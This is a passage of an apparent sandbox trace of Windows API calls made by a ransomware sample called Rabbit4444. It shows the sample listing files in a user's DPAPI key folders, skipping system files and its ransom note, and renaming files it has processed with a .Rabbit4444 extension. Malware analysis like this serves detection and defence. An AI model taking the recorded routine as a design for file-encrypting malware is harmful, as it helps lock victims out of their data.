cAlternateFileName="S-1-5-~1")) returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="Rabbit4444.exe") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2=".") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="..") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="windows") returned -1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="bootmgr") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="pagefile.sys") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="boot") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="ids.txt") returned 1 [0052.629] lstrcmpiW (lpString1="S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="NTUSER.DAT") returned 1 [0052.629] lstrcpyW (in: lpString1=0x130eb9c, lpString2="S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="S-1-5-21-1051304884-625712362-2192934891-1000") returned="S-1-5-21-1051304884-625712362-2192934891-1000" [0052.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1206b0 [0052.630] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x103f58 [0052.630] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1206b8 | out: ListHead=0xf68b0, ListEntry=0x1206b8) returned 0x120818 [0052.630] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44622928, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44622928, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bc7f8fe, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="Rabbit4444.exe") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2=".") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="..") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="windows") returned -1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="bootmgr") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="pagefile.sys") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="boot") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="ids.txt") returned 1 [0052.630] lstrcmpiW (lpString1="SYNCHIST", lpString2="NTUSER.DAT") returned 1 [0052.630] lstrcpyW (in: lpString1=0x130eb9c, lpString2="SYNCHIST" | out: lpString1="SYNCHIST") returned="SYNCHIST" [0052.630] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST", dwFileAttributes=0x22) returned 1 [0052.633] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST", dwFileAttributes=0x6) returned 1 [0052.633] lstrlenW (lpString="SYNCHIST") returned 8 [0052.633] lstrlenW (lpString="Rabbit4444") returned 10 [0052.633] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0052.633] lstrlenW (lpString=".dll") returned 4 [0052.633] lstrcmpiW (lpString1="HIST", lpString2=".dll") returned 1 [0052.633] lstrlenW (lpString=".lnk") returned 4 [0052.633] lstrcmpiW (lpString1="HIST", lpString2=".lnk") returned 1 [0052.633] lstrlenW (lpString=".ini") returned 4 [0052.633] lstrcmpiW (lpString1="HIST", lpString2=".ini") returned 1 [0052.633] lstrlenW (lpString=".sys") returned 4 [0052.633] lstrcmpiW (lpString1="HIST", lpString2=".sys") returned 1 [0052.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.634] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.634] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14394444757) returned 1 [0052.634] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76) returned 1 [0052.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0052.634] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0052.634] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x298 [0052.635] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x70000 [0052.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.636] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.636] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14394729985) returned 1 [0052.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0052.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0052.637] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.637] CloseHandle (hObject=0x298) returned 1 [0052.637] CloseHandle (hObject=0x278) returned 1 [0052.637] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.Rabbit4444") returned 69 [0052.637] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\synchist.rabbit4444"), dwFlags=0x1) returned 1 [0052.637] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44622928, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44622928, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bc7f8fe, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0052.638] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0052.638] lstrcpyW (in: lpString1=0x130eb9c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.638] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.638] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.638] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.638] CloseHandle (hObject=0x278) returned 1 [0052.638] CloseHandle (hObject=0x27c) returned 1 [0052.638] GetCurrentThreadId () returned 0xd98 [0052.638] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1206b8 [0052.638] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" [0052.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103f58 | out: hHeap=0xe0000) returned 1 [0052.639] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1206b0 | out: hHeap=0xe0000) returned 1 [0052.639] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000" [0052.639] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\" [0052.639] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" [0052.639] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.642] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.644] FlushFileBuffers (hFile=0x27c) returned 1 [0052.645] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.645] CloseHandle (hObject=0x27c) returned 1 [0052.650] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 95 [0052.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.650] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xe8b423d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0052.651] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.651] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.651] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.651] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.651] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0xe8b423d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.651] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.651] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.651] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.651] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.651] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.651] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8b423d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8b423d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8b423d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.651] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.651] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.651] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xb9994c1e, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xb9994c1e, ftLastAccessTime.dwHighDateTime=0x1d38c43, ftLastWriteTime.dwLowDateTime=0x2b8c6049, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="20cac00a-26e8-46c6-ab84-90a52b05e557", cAlternateFileName="20CAC0~1")) returned 1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="Rabbit4444.exe") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2=".") returned 1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="..") returned 1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="windows") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="bootmgr") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="pagefile.sys") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="boot") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="ids.txt") returned -1 [0052.651] lstrcmpiW (lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557", lpString2="NTUSER.DAT") returned -1 [0052.651] lstrcpyW (in: lpString1=0x130ebf8, lpString2="20cac00a-26e8-46c6-ab84-90a52b05e557" | out: lpString1="20cac00a-26e8-46c6-ab84-90a52b05e557") returned="20cac00a-26e8-46c6-ab84-90a52b05e557" [0052.651] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557", dwFileAttributes=0x22) returned 1 [0052.652] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557", dwFileAttributes=0x6) returned 1 [0052.652] lstrlenW (lpString="20cac00a-26e8-46c6-ab84-90a52b05e557") returned 36 [0052.652] lstrlenW (lpString="Rabbit4444") returned 10 [0052.652] lstrcmpiW (lpString1="a52b05e557", lpString2="Rabbit4444") returned -1 [0052.652] lstrlenW (lpString=".dll") returned 4 [0052.652] lstrcmpiW (lpString1="e557", lpString2=".dll") returned 1 [0052.652] lstrlenW (lpString=".lnk") returned 4 [0052.652] lstrcmpiW (lpString1="e557", lpString2=".lnk") returned 1 [0052.653] lstrlenW (lpString=".ini") returned 4 [0052.653] lstrcmpiW (lpString1="e557", lpString2=".ini") returned 1 [0052.653] lstrlenW (lpString=".sys") returned 4 [0052.653] lstrcmpiW (lpString1="e557", lpString2=".sys") returned 1 [0052.653] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.653] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.653] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14396356800) returned 1 [0052.653] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=468) returned 1 [0052.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0052.653] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0052.653] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.654] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.655] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0052.655] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0052.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.656] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14396640180) returned 1 [0052.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0052.656] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0052.656] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.656] CloseHandle (hObject=0x298) returned 1 [0052.656] CloseHandle (hObject=0x278) returned 1 [0052.656] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.Rabbit4444") returned 143 [0052.656] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\20cac00a-26e8-46c6-ab84-90a52b05e557.rabbit4444"), dwFlags=0x1) returned 1 [0052.657] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd20187d7, ftCreationTime.dwHighDateTime=0x1d47c31, ftLastAccessTime.dwLowDateTime=0xd20187d7, ftLastAccessTime.dwHighDateTime=0x1d47c31, ftLastWriteTime.dwLowDateTime=0x2ba69b91, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", cAlternateFileName="5C4D6E~1")) returned 1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="Rabbit4444.exe") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2=".") returned 1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="..") returned 1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="windows") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="bootmgr") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="pagefile.sys") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="boot") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="ids.txt") returned -1 [0052.657] lstrcmpiW (lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", lpString2="NTUSER.DAT") returned -1 [0052.657] lstrcpyW (in: lpString1=0x130ebf8, lpString2="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" | out: lpString1="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1") returned="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" [0052.657] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", dwFileAttributes=0x22) returned 1 [0052.658] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1", dwFileAttributes=0x6) returned 1 [0052.658] lstrlenW (lpString="5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1") returned 36 [0052.658] lstrlenW (lpString="Rabbit4444") returned 10 [0052.658] lstrcmpiW (lpString1="4debf6bfd1", lpString2="Rabbit4444") returned -1 [0052.658] lstrlenW (lpString=".dll") returned 4 [0052.658] lstrcmpiW (lpString1="bfd1", lpString2=".dll") returned 1 [0052.658] lstrlenW (lpString=".lnk") returned 4 [0052.658] lstrcmpiW (lpString1="bfd1", lpString2=".lnk") returned 1 [0052.658] lstrlenW (lpString=".ini") returned 4 [0052.658] lstrcmpiW (lpString1="bfd1", lpString2=".ini") returned 1 [0052.658] lstrlenW (lpString=".sys") returned 4 [0052.658] lstrcmpiW (lpString1="bfd1", lpString2=".sys") returned 1 [0052.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.658] QueryPerformanceFrequency (in: 